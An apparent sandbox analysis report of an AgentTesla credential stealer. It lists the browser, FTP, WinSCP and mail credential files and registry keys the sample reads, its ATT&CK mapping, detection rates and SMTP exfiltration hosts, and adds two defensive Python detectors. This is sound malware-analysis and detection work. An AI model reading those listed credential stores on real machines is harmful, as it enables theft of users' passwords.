Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Queries volume information: C:\Windows\assembly\GAC_32\CustomMarshalers\2.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

The long run of font-file queries is GDI+ enumerating the installed font collection on behalf of a .NET System.Drawing caller; on its own it is noise, not a behaviour indicator. The MachineGuid read is different: that value is a stable per-installation identifier, which is what a stealer uses to tag a victim in its reports.

Stealing of Sensitive Information:

Yara detected AgentTesla
Source: Yara match | File source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BILL-OOO566876.exe PID: 1156, type: MEMORY
Source: Yara match | File source: Process Memory Space: BILL-OOO566876.exe PID: 1308, type: MEMORY
Source: Yara match | File source: 0.2.BILL-OOO566876.exe.40f75c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.BILL-OOO566876.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BILL-OOO566876.exe.40f75c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BILL-OOO566876.exe.3fb6720.3.raw.unpack, type: UNPACKEDPE

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Only the WinSCP session key is touched in this trace; no PuTTY session key access is recorded, despite the signature name.

Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\BILL-OOO566876.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BILL-OOO566876.exe PID: 1156, type: MEMORY
The Outlook subkey 9375CFF0413111d3B88A00104B2A6676 is the standard per-profile account-settings key, where Outlook keeps account names, server settings and obfuscated passwords; reading it is the classic Outlook credential-theft primitive. Note that every store is read by the sample's own process rather than by the owning application, which is the behaviour a detection should key on.
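The file and registry targets listed in this section are exactly what a host-based detection for this behaviour should key on. The following is an added example, not code from the report or from Joe Sandbox: it groups file-open and registry-open events by process and flags any single process that reads credential stores belonging to two or more unrelated applications, with the MachineGuid lookup recorded above carried along as supporting context. The event records, their schema (pid, image, op, target, value) and the PIDs are constructed for the example and are not the sandbox's own format; the paths and keys are the ones the report records.

```python
import re
from collections import defaultdict

# Credential-store artifacts read by the sample, taken from the report
# (file paths under the user profile, registry keys under HKCU).  Each regex
# maps to the application whose secrets live there.  Matching is
# case-insensitive because NTFS paths and registry keys are.
CREDENTIAL_STORES = {
    r"\\AppData\\Roaming\\Mozilla\\Firefox\\profiles\.ini$": "firefox",
    r"\\AppData\\Local\\Google\\Chrome\\User Data\\[^\\]+\\Login Data$": "chrome",
    r"\\AppData\\Roaming\\FileZilla\\recentservers\.xml$": "filezilla",
    r"\\AppData\\Roaming\\SmartFTP\\Client 2\.0\\Favorites\\": "smartftp",
    r"\\AppData\\Roaming\\Thunderbird\\profiles\.ini$": "thunderbird",
    r"^HKEY_CURRENT_USER\\SOFTWARE\\Martin Prikryl\\WinSCP 2\\Sessions": "winscp",
    r"^HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\"
    r"Windows Messaging Subsystem\\Profiles\\": "outlook",
    r"^HKEY_CURRENT_USER\\Software\\IncrediMail\\Identities": "incredimail",
}

# Stable per-install GUID the sample also read; a stealer uses it as a victim
# identifier.  Not a credential store, but useful supporting context.
MACHINE_GUID_KEY = r"^HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography$"


def classify(target):
    """Return the application whose credential store `target` belongs to, or None."""
    for pattern, family in CREDENTIAL_STORES.items():
        if re.search(pattern, target, re.IGNORECASE):
            return family
    return None


def sweep_findings(events, min_families=2):
    """Flag processes that read credential stores of `min_families` or more
    unrelated applications.  A browser reading its own Login Data is normal;
    one binary reading browser, FTP and mail stores in a single run is the sweep."""
    per_pid = defaultdict(lambda: {"image": None, "families": set(), "machine_guid": False})
    for ev in events:
        rec = per_pid[ev["pid"]]
        rec["image"] = ev["image"]
        family = classify(ev["target"])
        if family:
            rec["families"].add(family)
        if ev.get("value") == "MachineGuid" and re.search(MACHINE_GUID_KEY, ev["target"], re.IGNORECASE):
            rec["machine_guid"] = True
    findings = [
        {"pid": pid, "image": rec["image"], "families": sorted(rec["families"]),
         "machine_guid": rec["machine_guid"]}
        for pid, rec in per_pid.items()
        if len(rec["families"]) >= min_families
    ]
    return sorted(findings, key=lambda f: f["pid"])


# Constructed events (schema and PIDs are assumptions for this example; the
# targets are the paths and keys the report records).
_SAMPLE = r"C:\Users\user\Desktop\BILL-OOO566876.exe"
SAMPLE_EVENTS = [
    # benign: each application touching only its own store
    {"pid": 2040, "image": r"C:\Program Files\Mozilla Firefox\firefox.exe", "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"pid": 2188, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe", "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    # the sample: one process sweeping every store it knows about
    {"pid": 1308, "image": _SAMPLE, "op": "RegQueryValue",
     "target": r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography", "value": "MachineGuid"},
    {"pid": 1308, "image": _SAMPLE, "op": "RegOpenKey",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"pid": 1308, "image": _SAMPLE, "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"pid": 1308, "image": _SAMPLE, "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"pid": 1308, "image": _SAMPLE, "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect"},
    {"pid": 1308, "image": _SAMPLE, "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml"},
    {"pid": 1308, "image": _SAMPLE, "op": "FileOpen",
     "target": r"C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini"},
    {"pid": 1308, "image": _SAMPLE, "op": "RegOpenKey",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    # font enumeration from the same process: noise, not a credential store
    {"pid": 1308, "image": _SAMPLE, "op": "FileQueryInfo",
     "target": r"C:\Windows\Fonts\marlett.ttf"},
]

if __name__ == "__main__":
    for f in sweep_findings(SAMPLE_EVENTS):
        print(f"pid {f['pid']} ({f['image']}) read {len(f['families'])} credential stores: "
              f"{', '.join(f['families'])}; MachineGuid queried: {f['machine_guid']}")
```

The threshold of two families is the design point: a single store access is something its owning application does every day, while a process reading the Chrome and FileZilla and Outlook stores has no legitimate reason to exist on a workstation. Raising the threshold lowers noise further; the font-query line shows why unrelated file activity from the same process must not count.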

Remote Access Functionality:

Yara detected AgentTesla
Source: Yara match | File source: 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.222165033.0000000003F36000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.469525382.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: BILL-OOO566876.exe PID: 1156, type: MEMORY
Source: Yara match | File source: Process Memory Space: BILL-OOO566876.exe PID: 1308, type: MEMORY
Source: Yara match | File source: 0.2.BILL-OOO566876.exe.40f75c0.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 2.2.BILL-OOO566876.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BILL-OOO566876.exe.40f75c0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.BILL-OOO566876.exe.3fb6720.3.raw.unpack, type: UNPACKEDPE
These are the same Yara matches listed under Stealing of Sensitive Information. The remote-access classification follows from the family identification, not from any remote-control behaviour separately observed in this trace.

Mitre Att&ck Matrix

Digits appended to a technique name (for example "Process Injection 112") are the report's per-technique count badges, reproduced as rendered. Empty cells are techniques the matrix shows but the report did not map.

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Windows Management Instrumentation 211 | Path Interception | Access Token Manipulation 1 | Masquerading 1 | OS Credential Dumping 2 | Query Registry 1 | Remote Services | Email Collection 1 | Exfiltration Over Other Network Medium | Encrypted Channel 1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Native API 1 | Boot or Logon Initialization Scripts | Process Injection 112 | Disable or Modify Tools 11 | Credentials in Registry 1 | Security Software Discovery 211 | Remote Desktop Protocol | Archive Collected Data 11 | Exfiltration Over Bluetooth | Non-Standard Port 1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion 131 | Security Account Manager | Process Discovery 2 | SMB/Windows Admin Shares | Data from Local System 2 | Automated Exfiltration | Non-Application Layer Protocol 1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Access Token Manipulation 1 | NTDS | Virtualization/Sandbox Evasion 131 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol 11 | SIM Card Swap | | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Process Injection 112 | LSA Secrets | Application Window Discovery 1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Deobfuscate/Decode Files or Information 1 | Cached Domain Credentials | Remote System Discovery 1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Obfuscated Files or Information 2 | DCSync | System Information Discovery 114 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Software Packing 3 | Proc Filesystem | Network Service Scanning | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue

Behavior Graph

[Behavior graph image not reproduced. Legend: Process, Signature, Created File, DNS/IP Info, Is Dropped, Is Windows Process, Number of created Registry Values, Number of created Files, Visual Basic, Delphi, Java, .Net C# or VB.NET, C, C++ or other language, Is malicious, Internet]

Screenshots

[Screenshot thumbnails not reproduced.]

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

Source | Detection | Scanner | Label
BILL-OOO566876.exe | 25% | Virustotal |
BILL-OOO566876.exe | 16% | Metadefender |
BILL-OOO566876.exe | 52% | ReversingLabs | Win32.Trojan.AgentTesla
BILL-OOO566876.exe | 100% | Joe Sandbox ML |

                    Dropped Files

                    No Antivirus matches

Unpacked PE Files

Source | Detection | Scanner | Label
2.2.BILL-OOO566876.exe.400000.0.unpack | 100% | Avira | TR/Spy.Gen8

The on-disk loader draws only 16% to 52% multi-engine coverage, while the payload unpacked from process 2 at image base 0x400000 is flagged outright. Signature-based scanning of the file alone underrates this sample; the payload only exists in memory after injection.

                    Domains

                    No Antivirus matches

                    URLs

Source | Detection | Scanner | Label
http://127.0.0.1:HTTP/1.1 | 0% | Avira URL Cloud | safe
http://www.fonts.comno | 0% | Avira URL Cloud | safe
http://www.founder.com.cn/cn/bThe | 0% | URL Reputation | safe
http://hBlbMr.com | 0% | Avira URL Cloud | safe
http://www.tiro.com | 0% | URL Reputation | safe
https://8chan.moe/ | 0% | Avira URL Cloud | safe
http://YdPNTdHEQXue9T.orgl; | 0% | Avira URL Cloud | safe
http://www.goodfont.co.kr | 0% | URL Reputation | safe
http://www.carterandcone.com | 0% | URL Reputation | safe
http://www.carterandcone.com) | 0% | Avira URL Cloud | safe
http://www.sajatypeworks.com | 0% | URL Reputation | safe
http://www.typography.netD | 0% | URL Reputation | safe
http://www.founder.com.cn/cn/cThe | 0% | URL Reputation | safe
http://www.galapagosdesign.com/staff/dennis.htm | 0% | URL Reputation | safe
http://fontfabrik.com | 0% | URL Reputation | safe
http://www.galapagosdesign.com/DPlease | 0% | URL Reputation | safe
http://www.sandoll.co.kr | 0% | URL Reputation | safe
http://www.urwpp.deDPlease | 0% | URL Reputation | safe
http://www.zhongyicts.com.cn | 0% | URL Reputation | safe
http://www.sakkal.com | 0% | URL Reputation | safe
http://www.fonts.comx | 0% | URL Reputation | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip | 0% | URL Reputation | safe
http://www.fontbureau.com= | 0% | Avira URL Cloud | safe
http://DynDns.comDynDNS | 0% | URL Reputation | safe
http://www.tiro.comx | 0% | Avira URL Cloud | safe
https://8kun.top/ | 0% | Avira URL Cloud | safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha | 0% | URL Reputation | safe
http://www.carterandcone.comY | 0% | Avira URL Cloud | safe
http://www.carterandcone.comu | 0% | Avira URL Cloud | safe
http://www.fontbureau.coma | 0% | URL Reputation | safe
http://en.w | 0% | URL Reputation | safe
https://raw.githubusercontent.com/ | 0% | Avira URL Cloud | safe
http://www.carterandcone.coml | 0% | URL Reputation | safe
http://www.founder.com.cn/cn | 0% | URL Reputation | safe
http://www.jiyu-kobo.co.jp/ | 0% | URL Reputation | safe
http://YdPNTdHEQXue9T.org | 0% | Avira URL Cloud | safe
http://www.tiro.comc | 0% | URL Reputation | safe

                    Domains and IPs

                    Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
us2.smtp.mailhostbox.com | 208.91.199.225 | true | false | | high
smtp.syntrnomh.com | unknown | unknown | true | | unknown

Both contacted hosts are SMTP servers, which matches mail-based exfiltration of the harvested credentials. us2.smtp.mailhostbox.com is live and carries a high reputation: it is a shared mail provider the sample abuses rather than attacker-owned infrastructure, so blocking its IP will also break legitimate customers of that provider; treat it as context and alert on the originating process instead. smtp.syntrnomh.com did not resolve during the analysis but is flagged malicious.
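The distinction between the two hosts above matters for how the indicators are used. The following is an added example, not code from the report or from Joe Sandbox: it runs the two contacted domains and the resolved IP over DNS and connection events, and assigns severity according to whether the indicator is shared infrastructure and whether the connecting process is one that is expected to speak SMTP. The key=value log format, the destination port, the Thunderbird and svchost lines and the severity scheme are all constructed for the example; the domains and the IP are the ones in the table.

```python
import re
from dataclasses import dataclass

# Network indicators from the "Contacted Domains" table.  The report marks
# neither host as malicious by itself: us2.smtp.mailhostbox.com is a live,
# high-reputation SMTP host shared with legitimate tenants, and
# smtp.syntrnomh.com never resolved.  The `shared` flag drives severity.
@dataclass(frozen=True)
class NetIoc:
    value: str
    kind: str             # "domain" or "ip"
    shared: bool = False  # True when the host also serves legitimate users

IOCS = [
    NetIoc("us2.smtp.mailhostbox.com", "domain", shared=True),
    NetIoc("208.91.199.225", "ip", shared=True),
    NetIoc("smtp.syntrnomh.com", "domain"),
]

# Processes expected to speak SMTP.  Anything else doing so to an IOC host is
# the mail-based exfiltration pattern this family uses.
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SMTP_PORTS = {25, 465, 587}

# Constructed log lines in an assumed key=value form (not the sandbox's own
# format); values containing spaces are double-quoted.  Port numbers and the
# last two lines are invented for the example.
SAMPLE_LOG = r'''
event=DnsQuery image="C:\Users\user\Desktop\BILL-OOO566876.exe" query=us2.smtp.mailhostbox.com result=208.91.199.225
event=NetworkConnect image="C:\Users\user\Desktop\BILL-OOO566876.exe" dst=208.91.199.225 dport=587
event=DnsQuery image="C:\Users\user\Desktop\BILL-OOO566876.exe" query=smtp.syntrnomh.com result=NXDOMAIN
event=NetworkConnect image="C:\Program Files\Mozilla Thunderbird\thunderbird.exe" dst=208.91.199.225 dport=587
event=NetworkConnect image="C:\Windows\System32\svchost.exe" dst=203.0.113.10 dport=443
'''

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_line(line):
    """Split one key=value line into a dict; quoted and bare values both work."""
    return {key: quoted if quoted else bare for key, quoted, bare in KV_RE.findall(line)}


def severity_for(ioc, image, smtp_connection):
    """A hit on a dedicated host is always high.  A shared host is only high
    when a process with no business speaking SMTP connects to it; a real mail
    client using the same provider is context, not an alert."""
    if not ioc.shared:
        return "high"
    if image in MAIL_CLIENTS:
        return "info"
    return "high" if smtp_connection else "medium"


def match_events(log_text):
    """Run the IOC set over DNS and connection events; return alerts in log order."""
    index = {ioc.value.lower(): ioc for ioc in IOCS}
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        ev = parse_line(raw)
        image = ev.get("image", "").rsplit("\\", 1)[-1].lower()
        if ev.get("event") == "DnsQuery":
            hit = index.get(ev.get("query", "").lower())
            smtp = False
        elif ev.get("event") == "NetworkConnect":
            hit = index.get(ev.get("dst", "").lower())
            smtp = int(ev.get("dport", "0")) in SMTP_PORTS
        else:
            hit = None
            smtp = False
        if hit:
            alerts.append({"ioc": hit.value, "image": image, "event": ev["event"],
                           "severity": severity_for(hit, image, smtp)})
    return alerts


if __name__ == "__main__":
    for a in match_events(SAMPLE_LOG):
        print(f"[{a['severity']:<6}] {a['event']:<14} {a['image']} -> {a['ioc']}")
```

The point of the `shared` flag is that the same IP produces a high-severity alert when the sample's process connects to it and only an informational record when Thunderbird does; a flat block list for 208.91.199.225 would fire on both and break mail for everyone using that provider.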

                        URLs from Memory and Binaries

These are strings recovered from memory dumps and the binary, not endpoints the sample contacted (compare the Contacted Domains table above). The font-foundry URLs (fontbureau, tiro, carterandcone, sajatypeworks, galapagosdesign and similar) are TrueType name-table strings from the font files enumerated earlier in this report; trailing characters such as "G", "?", "D" and "DPlease" are overrun from adjacent data in the dump. The Tor download, DynDNS and GitHub strings were likewise not resolved or contacted during the run.

Name | Source | Malicious | Antivirus Detection | Reputation
http://127.0.0.1:HTTP/1.1 | BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.fontbureau.com/designersG | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | | high
http://www.fonts.comno | BILL-OOO566876.exe, 00000000.00000003.202973628.00000000053EB000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
https://github.com/murrty/ychanex/releases/latest | BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers/? | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | | high
http://www.founder.com.cn/cn/bThe | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://api.420chan.org/ | BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmp | false | | high
http://www.fontbureau.com/designers? | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | | high
http://hBlbMr.com | BILL-OOO566876.exe, 00000002.00000002.476024928.0000000002E51000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.tiro.com | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://8chan.moe/ | BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | unknown
http://www.fontbureau.com/designers | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | | high
http://YdPNTdHEQXue9T.orgl; | BILL-OOO566876.exe, 00000002.00000002.476441058.0000000002EFC000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.goodfont.co.kr | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com | BILL-OOO566876.exe, 00000000.00000003.206256359.00000000053D9000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.carterandcone.com) | BILL-OOO566876.exe, 00000000.00000003.206174068.00000000053D7000.00000004.00000001.sdmp | false | Avira URL Cloud: safe | low
http://www.sajatypeworks.com | BILL-OOO566876.exe, 00000000.00000003.202808276.00000000053EB000.00000004.00000001.sdmp; BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.typography.netD | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.founder.com.cn/cn/cThe | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://www.galapagosdesign.com/staff/dennis.htm | BILL-OOO566876.exe, 00000000.00000003.211731693.000000000540D000.00000004.00000001.sdmp; BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
http://fontfabrik.com | BILL-OOO566876.exe, 00000000.00000002.225516202.00000000054C0000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://github.com/murrty/ychanex | BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmp | false | | high
https://github.com/ | BILL-OOO566876.exe, 00000000.00000002.221101600.0000000002F11000.00000004.00000001.sdmp | false | | high
